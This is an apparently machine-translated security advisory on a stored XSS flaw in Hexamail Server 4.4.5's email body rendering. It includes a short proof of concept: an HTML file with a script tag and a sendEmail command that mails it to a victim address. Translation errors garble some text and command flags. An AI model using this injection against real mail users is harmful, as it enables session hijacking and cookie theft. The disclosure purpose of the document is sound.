Hexamail Server email body HTML Injection Vulnerability

Release date:
Updated on:

Affected Systems:
Hexamail Server 4.4.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53769

Hexamail Server is an advanced mail Server that supports all standard mail protocols.

The Hexamail Server 4.4.5 has an XSS vulnerability in the implementation of the mail body. by sending malicious scripts to the victim's email, the mail body can be automatically loaded without authorization, attackers can hijack user sessions in the victim's browser, redirect users, steal Cookie authentication creden。, and control the appearance of the site.

<* Source: modpr0be

Link: http://www.spentera.com/2012/06/hexamail-server-4-4-5-persistent-xss-vulnerability/

*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Root @ bt :~ /# Cat> meal.txt
<Html>
<Body>
<H1> XSS pop up <Script> alert ('Hi, what is this? '); </Script>
</Body>
</Html>
Root @ bt :~ /#

Send email to the victim:
Root @ bt :~ /# Sendemail-f bob@example.com-t david@example.com-xu bob@example.com \
-Xp bob123-u "Want some meal ..? "-O message-file=meal.txt-s mail.example.com

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Hexamail
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.hexamail.com/hexamailserver/